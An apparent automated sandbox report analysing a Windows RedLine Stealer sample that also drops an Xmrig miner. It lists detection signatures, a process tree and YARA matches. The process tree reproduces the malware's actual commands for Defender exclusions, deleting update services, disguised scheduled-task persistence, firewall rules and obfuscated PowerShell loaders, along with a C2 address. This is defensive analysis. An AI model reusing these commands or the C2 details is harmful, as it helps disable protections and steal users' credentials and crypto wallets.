Edit tour

Windows Analysis Report
hZDPlQwZ9D.exe

Overview

General Information

Sample Name:	hZDPlQwZ9D.exe
Analysis ID:	754275
MD5:	184cc76bbaab70f127ee9635e5a08147
SHA1:	67df4b82e570234a32726158850fd1e0f9afdb12
SHA256:	6485a029e9a15283f4834f89dfbbd87b19a77629a9a7eba0fd6639562e11208b
Tags:	exeRedLineStealer
Infos:

Detection

RedLine, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Sigma detected: Stop multiple services

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Uses netsh to modify the Windows network and firewall settings

Connects to many ports of the same IP (likely port scanning)

Uses cmd line tools excessively to alter registry or file data

Encrypted powershell cmdline option found

Machine Learning detection for sample

Allocates memory in foreign processes

Creates files in the system32 config directory

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Found many strings related to Crypto-Wallets (likely being stolen)

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses powercfg.exe to modify the power settings

Sample uses process hollowing technique

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Found hidden mapped module (file has been removed from disk)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Modifies the windows firewall

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Stores large binary data to the registry

Found potential string decryption / allocating functions

Creates job files (autostart)

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

hZDPlQwZ9D.exe (PID: 5852 cmdline: C:\Users\user\Desktop\hZDPlQwZ9D.exe MD5: 184CC76BBAAB70F127EE9635E5A08147)

conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 5440 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

brave.exe (PID: 5100 cmdline: "C:\Users\user\AppData\Local\Google\brave.exe" MD5: 9253ED091D81E076A3037E12AF3DC871)

powershell.exe (PID: 1380 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6068 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 348 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 4360 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 4496 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5332 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5320 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

reg.exe (PID: 5636 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 2236 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4436 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5196 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4904 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 5560 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 4896 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 3084 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 5304 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 6052 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 4948 cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dialer.exe (PID: 712 cmdline: C:\Windows\system32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)

powershell.exe (PID: 5792 cmdline: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2180 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

ofg.exe (PID: 1248 cmdline: "C:\Users\user\AppData\Local\Google\ofg.exe" MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 5856 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 272 cmdline: "C:\Users\user\AppData\Local\Google\chrome.exe" MD5: 8CD1EA50F8F4C45055400E70DA52B326)

powershell.exe (PID: 5984 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 4424 cmdline: powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2216 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 3796 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GoogleUpdate.exe (PID: 5128 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

netsh.exe (PID: 860 cmdline: netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 5192 cmdline: netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 5140 cmdline: netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

fl.exe (PID: 1776 cmdline: "C:\Users\user\AppData\Local\Temp\fl.exe" MD5: 098501D92E932B69246D3CC2AC8118BE)

WerFault.exe (PID: 1348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 132 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

ofg.exe (PID: 4664 cmdline: C:\Users\user\AppData\Local\Google\ofg.exe MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 3388 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 204 cmdline: C:\Users\user\AppData\Local\Google\chrome.exe MD5: 8CD1EA50F8F4C45055400E70DA52B326)

chrome.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Google\chrome.exe MD5: 8CD1EA50F8F4C45055400E70DA52B326)

powershell.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 1880 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dllhost.exe (PID: 576 cmdline: C:\Windows\System32\dllhost.exe /Processid:{7a77888d-cd31-4f67-91ce-46090c964f53} MD5: 2528137C6745C4EADD87817A1909677E)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)

updater.exe (PID: 3724 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: EB27BB8CFA99D659E4FE023E9002ECD1)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.10.55.124:47029"], "Authorization Header": "20099ff612f809efe61731940caf25e6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Google\ofg.exe	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
C:\Windows\Temp\571D.tmp	PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20	Detects XMRIG crypto coin miners	Florian Roth	0x1e6278:$x1: xmrig.exe 0x1e6164:$x2: xmrig.com 0x1e623c:$x2: xmrig.com
C:\Windows\Temp\571D.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x5987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1dff7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x4182f:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x8979f:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0xa97d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000041.00000000.541258672.000000014001C000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x5987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000000.294985121.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000000.294596055.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x5987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000041.00000000.539459041.000000014001C000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x5987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hZDPlQwZ9D.exe PID: 5852	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 5440	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 5440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 1880	SUSP_Obfuscted_PowerShell_Code	Detects obfuscated PowerShell Code	Florian Roth	0x131f4:$s1: ').Invoke( 0x1327f:$s1: ').Invoke( 0x132c2:$s1: ').Invoke( 0x13432:$s1: ').Invoke( 0x134bd:$s1: ').Invoke( 0x13500:$s1: ').Invoke( 0x14d0d:$s1: ').Invoke( 0x14d98:$s1: ').Invoke( 0x14ddb:$s1: ').Invoke( 0x15189:$s1: ').Invoke( 0x15214:$s1: ').Invoke( 0x15257:$s1: ').Invoke( 0x84aeb:$s1: ').Invoke( 0x84b76:$s1: ').Invoke( 0x84bb9:$s1: ').Invoke( 0x84d2a:$s1: ').Invoke( 0x84db5:$s1: ').Invoke( 0x84df8:$s1: ').Invoke( 0x8515f:$s1: ').Invoke( 0x851ea:$s1: ').Invoke( 0x8522d:$s1: ').Invoke(
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
61.2.powershell.exe.1cd24a3dc18.8.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x39dbf:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.7.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.13.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.11.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.1.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd24af6f58.11.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.5.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
13.0.ofg.exe.ea0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
61.2.powershell.exe.1cd24ad3720.10.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x2710f:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
68.0.winlogon.exe.254b29d0000.0.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.9.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd24a3dc18.8.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x3dbbf:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0.2.hZDPlQwZ9D.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.hZDPlQwZ9D.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x10418:$s6: constructor or from DllMain. 0x13470:$pat14: , CommandLine: 0x2ba3b:$v2_1: ListOfProcesses 0x2b7cf:$v4_3: base64str 0x2c83e:$v4_4: stringKey 0x29418:$v4_5: BytesToStringConverted 0x28480:$v4_6: FromBase64 0x29be0:$v4_8: procName 0x29f63:$v5_1: DownloadAndExecuteUpdate 0x2b6df:$v5_2: ITaskProcessor 0x29f51:$v5_3: CommandLineUpdate 0x29f42:$v5_4: DownloadUpdate 0x2a5d9:$v5_5: FileScanning 0x29787:$v5_7: RecordHeaderField 0x291a6:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
65.0.dllhost.exe.140000000.0.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd24ab9470.9.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x413bf:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.12.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
68.0.winlogon.exe.254b29d0000.0.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
12.2.chrome.exe.13548d0.1.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x13ec5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x141d5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x144b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x147a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14a91:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 